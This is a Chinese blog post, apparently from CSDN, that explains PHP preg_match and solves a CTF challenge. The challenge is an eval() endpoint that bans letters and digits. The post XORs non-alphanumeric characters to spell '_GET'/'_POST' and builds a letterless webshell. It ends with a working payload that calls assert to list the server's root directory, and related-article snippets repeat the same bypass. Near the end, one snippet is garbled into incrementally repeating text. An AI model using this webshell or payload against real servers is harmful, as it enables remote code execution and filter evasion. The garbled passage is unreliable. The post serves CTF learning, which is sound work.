preg_match详解

最新推荐文章于 2024-05-16 12:30:56 发布
最新推荐文章于 2024-05-16 12:30:56 发布
阅读量4.8k 收藏 4
点赞数
分类专栏: PHP脚本学习 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51524329/article/details/121638062
版权 
<?php
$shell=">";
	if(!preg_match("/[a-zA-Z0-9_$@]+/",$shell)){
	echo "1";}else{
	echo "0";}
?>

shell的值没有在正则表达式中,返回为0,但是前面还有一个!,所以就变成了真输出为1

if 语句嵌套
以下情况均属于 if 结构嵌套。
if 语句体中可以含有 if 语句或 if-else 语句。
if-else 语句中的 if 体或者 else 体中含有 if 语句或 if-else 语句。

注意:
1)在嵌套结构中会有多个“if”与多个“else”关键词,每一个“else”都应有对应的“if”相配对。原则:“else”与其前面最近的还未配对的“if”相配对。

2)配对的 if-else 语句可以看成一条简单语句。

3)一条 if 语句也可以看成一条简单语句。

绕过不是英文字母,不是数字的验证。

preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) : int

preg_match()返回 pattern 的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。preg_match_all()不同于此,它会一直搜索subject 直到到达结尾。 如果发生错误preg_match()返回 FALSE。

正文

题目源码

<?php
error_reporting(0);
if(isset($_GET['code'])){
        $code=$_GET['code'];
            if(strlen($code)>40){
                    die("This is too Long.");
                    }
            if(preg_match("/[A-Za-z0-9]+/",$code)){
                    die("NO.");
                    }
            @eval($code);
}
else{
        highlight_file(__FILE__);
}
highlight_file(__FILE);
// ?>

 
 

 
 
  • 可以看到这段代码中,要求而传入的参数不能带有数字和英文字母,
     

  
  
    要是用非字母、数字的字符经过各种变换,最后能构造出 a-z 中任意一个字符,并且字符串长度小于40。然后再利用 PHP允许动态函数执行的特点,拼接处一个函数,然后执行这个函数getshell
     

  
  
    如何构造
     

  
  
     
 
   
   
    在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。
     

  
  
     

  
  
    <?php
    echo "A"^"?";
?>

   
   
    
   
   
       

  
  
      KSYz01.png
       

  
  
      A的ASCII值是65,对应的二进制值是01000001
       

  
  
      ?的ASCII值是63,对应的二进制值是00111111
       

  
  
      异或的二进制的值是10000000,对应的ASCII值是126,对应的字符串的值就是~了
       

  
  
      以此可以构造webshell
       

  
  
      <?php
@$_++; //$_=NULL=0  $_++=1
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); //_POST
${$__}[!$_](${$__}[$_]);     // $_POST[0]($_POST[1]);
?>

   
   
      
   
   
      • 为了节省字符长度,这里字符可以一起异或使用
         

    
    
        <?php
var_dump("#./|{"^"|~`//"); //_POST
var_dump("`{{{"^"?<>/"); //_GET
?>

     
     
        
     
     
        • 1
        • 2
        • 3
        • 4
         

    
    
        最终payload
         

    
    
        ?code=$_="`{
      
      {
      
      {"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=print_r(`scandir`('/'))

     
     
        
     
     
        • 1
         

    
    
        KSUmJf.png
         

    
    
        参考文章
         

    
    
        参考文章
    红云谈安全
    关注
    • 0
      点赞
    • 4
      收藏
      觉得还不错? 一键收藏
    • 0
      评论
    专栏目录
    ctf php侧漏,ctf中常见php rce绕过总结
    weixin_39723010的博客
    03-16 1634
    php webshell的研究只是总结一些常见的姿势,大佬轻喷无字母的情况一个经典的示例if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {eval($_GET['shell']);}在eval中执行,相当于用传入内容创建了一个新的php文件,也就是说= 这些也是可以用的在没有字母的情况下,php5可以通过$_($__);这个$_,会被php按照call...
    preg_match函数绕过
    weixin_42346836的博客
    10-16 4633
    PHP preg_match():执行正则表达式匹配 函数语法格式如下: preg_match($pattern,$subject [, &$matches [, $flags = 0 [, $offset = 0 ]]]) ###参数说明如下: $pattern:要搜索的模式,也就是编辑好的正则表达式; $subject:要搜索的字符串; $matches:可选参数(数组类型),如果提供了 $matches,它将被填充为搜索结果。 $matches[0] 包含完整模式匹配到的文本, $mat
    如何通过非数字与字符的方式实现PHP WebShell详解
    12-12
    前言 本文主要给大家介绍的是关于通过非数字与字符实现PHP WebShell的相关资料,分享出来供大家参考学习,下面来一起看看详细的介绍: 一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']); } 但如果你想要绕过WAF的话,你还得使用一些其他的技术来重写你的webshell。 思路 首先我们要明确思路,我的核心思想就是通过一系列字符变换最终利用非字母和非数字字符构建出webshell,然后使用PHP的动态函数(例如“
    php非数字,如何通过非数字与字符的方式实现PHP WebShell详解
    weixin_32264185的博客
    03-09 258
    如何通过非数字与字符的方式实现PHP WebShell详解发布时间:2020-10-18 07:53:01来源:脚本之家阅读:67作者:Alpha_h4ck前言本文主要给大家介绍的是关于通过非数字与字符实现PHP WebShell的相关资料,分享出来供大家参考学习,下面来一起看看详细的介绍:一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样:if(!preg_match('...
    php正则表达式之preg_match详解
    滴水石穿
    05-15 3674
    preg_match 在目标字符串中搜索指定模式(你给的正则表达式),只匹配一次,匹配上了就马上停止搜索返回结果--它的值将是0次(不匹配)或1次。 参数列表: pattern 要搜索的模式 ; subject : 目标字符串; matches:如果提供了参数matches,它将被填充为搜索结果,$matches[0] 为完全匹配的字符串, $matches[1] 匹配的字符串在目标字符串偏移下标; flags:可选PREG_OFFSET_CAPTURE (值256),如果设置为PREG_..
    preg_match函数的用法和匹配字符的的含义
    qq_42318977的博客
    04-07 1万+
    利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football"; if (preg_match('/foo/', $string)) { // 匹配正确 } 上面的例子将成功匹配,因为单词 football 里面包含 foo。现在我们来试一个更复杂的,例如验证一个 Email 地址。 $string
    CTF 总结02:preg_match()绕过
    热门推荐
    weixin_42789937的博客
    01-18 1万+
    preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
    PHP函数补完:preg_match()
    weixin_30823683的博客
    10-07 216
    preg_match — 进行正则表达式匹配。 语法:int preg_match ( string $pattern , string $subject [, array $matches [, int $flags ]] ) 在 subject 字符串中搜索与 pattern 给出的正则表达式相匹配的内容。如果提供了 matches ,则其会被搜索的结果所填充。$matches...
    php 正则表达式-preg_match/preg_match_all
    不知道起什么名字
    07-21 1645
    正则表达式的组成部分 1.定界符 (必须) 通常使用特殊字符组成,常用“/”。 2.原子(必须) 是正则表达式的最基本组成单元,而且在每个模式中最少要包含一个原子。原子是由所有那些未显示指定为元字符的打印和非打印字符组成,具体分为5类。 普通字符作为原子:如a~z,A~Z,0~9。 一些特殊字符和转义后元字符作为原子:\' \* \+ \? \.等。 一些非打印字符作为原子:如:f n ...
    PHP中preg_match正则匹配中的/u、/i、/s含义
    01-20
    PHP中preg_match正则匹配的/u /i /s是什么意思 /u 表示按unicode(utf-8)匹配(主要针对多字节比如汉字) /i 表示不区分大小写(如果表达式里面有 a, 那么 A 也是匹配对象) /s 表示将字符串视为单行来匹配 您...
    PHP过滤★等特殊符号的正则
    01-20
    复制代码 代码如下: if(preg_match(“/[ ‘.,:;*?~`!@#$%^&+=)(<>{}]|\]|\[|\/|\\\|\”|\|/”,$user)){ echo ‘不要在名字里面整些特殊符号,请只使用字母、数字和汉字,当然要你的浏览器要选简体中文GB2312哟,...
    PHP判断密码强度的方法详解
    01-20
    分享给大家供大家参考,具体如下: ... $score = 0;...if(preg_match(/[0-9]+/,$str)) { $score ++; } if(preg_match(/[0-9]{3,}/,$str)) { $score ++; } if(preg_match(/[a-z]+/,$str)) { $score ++; }
    preg_match和preg_match_all()
    清风的博客
    06-06 4152
    preg_match—执行匹配正则表达式 preg_match(string$pattern,string$subject[,array&$matches[,int$flags= 0[,int$offset= 0]]] ) :int 参数 是否必须 说明 pattern 是 要搜索的模式 subject 是...
    preg_match()检查错误,并抛出异常的各种应用场景
    iamthebestiamthebest的博客
    03-08 660
    应用场景1:接收文件名.并导入该文件之前. 检查.接受到的文件名.是否为 字母,数组,下划线,多个组成? $开头标签拼接成变量. 所以不能再用$开头了.只能做正则匹配的结束标签 if (!preg_match("/^[0-9a-z_\-]+$/i", $file)) throw new ct_exception("$file is not valid"); 如果匹配成功.就赋
    preg_match 函数
    weixin_30278237的博客
    03-17 115
    preg_match 执行正则匹配表达式 int preg_match (string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0]]]) $partten 搜搜索的模式 字符串 $subject 输入字符串 $matches 若提供了参数 match...
    php正则函数一preg_match
    zxphdu的博客
    03-24 285
    《序》         PHP水平的高低取决于多方面的积累,包括系统架构、模块设计、代码规范以及php的扩展啊等等,这些概念听起来可能有些泛泛,一时半会儿也说不清;但可以肯定的是要想成为高水平的PHPer,一定得熟练地掌握PHP函数,手册中对PHP函数的说明个人觉得有些生硬,所以我决定写PHP函数系列博文,希望和大家共勉。每晚一篇。         今天给大家带来PHP正则函数preg_m...
    preg_match函数详解[wei静态充电]
    web开发
    08-25 296
    $str='sdfasfs12333ddd12233'; preg_match('/\d\d\d/si',$str,$arr);//找三个连续数字 echo '&lt;pre&gt;'; print_r($arr); echo '&lt;/pre&gt;'; 1。此函数,只会配第一个符合的值。 2。$arr[0]存其结果。 preg_match_all所有结果,故是二维数组:$a...
    如何同步管理1000个设备的VLAN数据?
    weixin_68261415的博客
    05-15 734
    为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
    关于 struct sockaddr_in
    最新发布
    weixin_73964834的博客
    05-16 658
    这个struct sockaddr_in 前三行有三个变量。
    !preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)
    05-05
    抱抱歉抱歉,抱歉,这抱歉,这是抱歉,这是一个抱歉,这是一个不抱歉,这是一个不完抱歉,这是一个不完整抱歉,这是一个不完整的抱歉,这是一个不完整的正抱歉,这是一个不完整的正则抱歉,这是一个不完整的正则表抱歉,这是一个不完整的正则表达抱歉,这是一个不完整的正则表达式抱歉,这是一个不完整的正则表达式。抱歉,这是一个不完整的正则表达式。它抱歉,这是一个不完整的正则表达式。它需要抱歉,这是一个不完整的正则表达式。它需要另抱歉,这是一个不完整的正则表达式。它需要另外抱歉,这是一个不完整的正则表达式。它需要另外的抱歉,这是一个不完整的正则表达式。它需要另外的字符抱歉,这是一个不完整的正则表达式。它需要另外的字符和抱歉,这是一个不完整的正则表达式。它需要另外的字符和结抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回答抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回答这抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回答这个抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回答这个问题抱歉,这是一个不完整的正则表达式。它需要另外的字符和结尾标记才能获得有效的匹配模式。需要提供更多的信息或完整的正则表达式才能回答这个问题。

    “相关推荐”对你有帮助么?

    • 非常没帮助
    • 没帮助
    • 一般
    • 有帮助
    • 非常有帮助
    提交
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包
    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值